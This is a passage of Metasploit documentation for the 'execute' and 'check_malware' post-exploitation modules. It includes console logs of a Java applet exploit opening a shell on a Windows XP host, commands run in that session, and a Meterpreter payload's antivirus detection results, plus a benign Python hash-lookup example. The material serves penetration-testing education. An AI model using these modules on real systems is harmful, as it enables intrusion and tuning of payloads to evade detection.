Multiple OS Post General Modules


This module executes an arbitrary command line on an open session. It works on Windows, Linux, OSX, and Unix platforms.

msf  post(execute) >
[*] 10.10.0.100      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400

msf  post(execute) > show options

Module options (post/multi/general/execute):

   Name     Current Setting       Required  Description
   ----     ---------------       --------  -----------
   COMMAND  echo hell > file.txt  no        The entire command line to execute on the session
   SESSION  1                     yes       The session to run this module on.

msf  post(execute) > run

[*] Executing echo hell > file.txt on #<Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response:
[*] Post module execution completed

msf  post(execute) >  sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2CB7-2817

 Directory of C:\Documents and Settings\administrator\Desktop

08/31/2012  09:04 AM    <DIR>          .
08/31/2012  09:04 AM    <DIR>          ..
08/31/2012  09:04 AM                46 file.txt
12/29/2011  03:52 PM                70 portlist.txt
               2 File(s)          1,431 bytes
               2 Dir(s)   4,899,721,216 bytes free

C:\Documents and Settings\administrator\Desktop>

This module uploads a file from the compromised host to virustotal.com and displays the scan results. It can also be run directly from within a Meterpreter session. It works on Windows, Linux, OSX, and Unix platforms.

msf post(check_malware) > show options

Module options (post/multi/gather/check_malware):

   Name        Current Setting      Required  Description
   ----        ---------------      --------  -----------
   APIKEY                           yes       VirusTotal API key
   REMOTEFILE  C:\msfrev.exe        yes       A file to check from the remote machine
   SESSION     1                    yes       The session to run this module on.

msf post(check_malware) > run

[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55):

=====================================================================================================================================

 Antivirus             Detected  Version        Result                           Update
 ---------             --------  -------        ------                           ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031      20151125
 AVG                   true      16.0.0.4460    Agent                            20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)        20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031      20151125
 AegisLab              false     1.5                                             20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1              20151124
 AhnLab-V3             true      2015.11.26.00  Trojan/Win32.Shell               20151125
 Alibaba               false     1.0                                             20151125
 Arcabit               true      1.0.0.624      Trojan.Zusy.Elzob.D1F5F          20151125
 Avast                 true      8.0.1489.320   Win32:SwPatch [Wrm]              20151125
 Avira                 true      8.3.2.4        TR/Crypt.EPACK.Gen2              20151125
 Baidu-International   true      3.5.1.41473    Trojan.Win32.Rozena.AM           20151124
 BitDefender           true      7.2            Gen:Variant.Zusy.Elzob.8031      20151125
 Bkav                  false     1.3.0.7383                                      20151125
 ByteHero              false     1.0.0.1                                         20151125
 CAT-QuickHeal         true      14.00          Trojan.Swrort.A                  20151125
 CMC                   false     1.1.0.977                                       20151124
 ClamAV                true      0.98.5.0       Win.Trojan.MSShellcode-7         20151125
 Comodo                true      23654          TrojWare.Win32.Rozena.A          20151125
 Cyren                 true      5.4.16.7       W32/Swrort.A                     20151125
 DrWeb                 true      7.0.16.10090   Trojan.Swrort.1                  20151125
 ESET-NOD32            true      12622          a variant of Win32/Rozena.AM     20151125
 Emsisoft              true      3.5.0.642      Gen:Variant.Zusy.Elzob.8031 (B)  20151125
 F-Prot                true      4.7.1.166      W32/Swrort.A                     20151125
 F-Secure              true      11.0.19100.45  Gen:Variant.Zusy.Elzob.8031      20151125
 Fortinet              true      5.1.220.0      W32/Swrort.C!tr                  20151125
 GData                 true      25             Gen:Variant.Zusy.Elzob.8031      20151125
 Ikarus                true      T3.1.9.5.0     Trojan.Win32.Swrort              20151125
 Jiangmin              false     16.0.100                                        20151124
 K7AntiVirus           true      9.212.17966    Backdoor ( 04c53cce1 )           20151125
 K7GW                  true      9.212.17968    Backdoor ( 04c53cce1 )           20151125
 Kaspersky             true      15.0.1.10      HEUR:Trojan.Win32.Generic        20151125
 Malwarebytes          true      2.1.1.1115     Backdoor.Bot.Gen                 20151125
...snip...

[*] Post module execution completed
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe

[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):

=====================================================================================================================================

 Antivirus             Detected  Version        Result                         Update
 ---------             --------  -------        ------                         ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031    20151125
 AVG                   true      16.0.0.4460    Agent                          20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)      20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031    20151125
 AegisLab              false     1.5                                           20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1            20151124
..snip..
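The module prints the sample's MD5, SHA1 and SHA256 and then a "positives / total" table. As an added example (not the module's own Ruby code), the Python below computes those three hashes locally and reduces a VirusTotal file/report response to the same summary, so an analyst can look a hash up first and only upload (and thereby share) a file that VirusTotal has never seen. The v2 `file/report` endpoint and response shape are assumed from the public v2 API; SAMPLE_REPORT is a constructed response, not real scan data.

```python
"""Hash a sample and read a VirusTotal v2 file/report the way check_malware presents it."""
import hashlib

VT_REPORT_URL = "https://www.virustotal.com/vtapi/v2/file/report"  # assumed public v2 hash-lookup endpoint


def file_hashes(data: bytes) -> dict:
    """MD5, SHA1 and SHA256 of the sample, the three values the module prints."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def report_request(apikey: str, sha256: str) -> tuple:
    """URL and POST parameters for a lookup by hash; nothing is uploaded."""
    return VT_REPORT_URL, {"apikey": apikey, "resource": sha256}


def summarize(report: dict) -> dict:
    """Reduce a v2 report to what the module shows: 'positives / total' plus one
    (engine, detected, version, result, update) row per engine, sorted by engine.
    response_code 0 means VirusTotal has never seen the hash, so only then would
    an upload (which shares the file with VirusTotal) be needed."""
    if report.get("response_code") != 1:
        return {"known": False, "positives": 0, "total": 0, "rows": []}
    rows = [(engine, s["detected"], s.get("version", ""), s.get("result") or "", s.get("update", ""))
            for engine, s in sorted(report["scans"].items())]
    return {"known": True, "positives": report["positives"], "total": report["total"], "rows": rows}


# Constructed response in the v2 shape; not a real VirusTotal reply.
SAMPLE_REPORT = {
    "response_code": 1, "positives": 2, "total": 3,
    "scans": {
        "EngineA": {"detected": True, "version": "1.0", "result": "Gen:Variant.Example", "update": "20151125"},
        "EngineB": {"detected": False, "version": "2.0", "result": None, "update": "20151125"},
        "EngineC": {"detected": True, "version": "3.0", "result": "Trojan.Example", "update": "20151124"},
    },
}

if __name__ == "__main__":
    h = file_hashes(b"constructed sample bytes")
    print(report_request("<APIKEY>", h["sha256"]))  # placeholder key, request is built but not sent
    s = summarize(SAMPLE_REPORT)
    print(f"Analysis Report ({s['positives']} / {s['total']}):")
    for engine, detected, version, result, update in s["rows"]:
        print(f" {engine:<10} {str(detected).lower():<8} {version:<8} {result:<22} {update}")
```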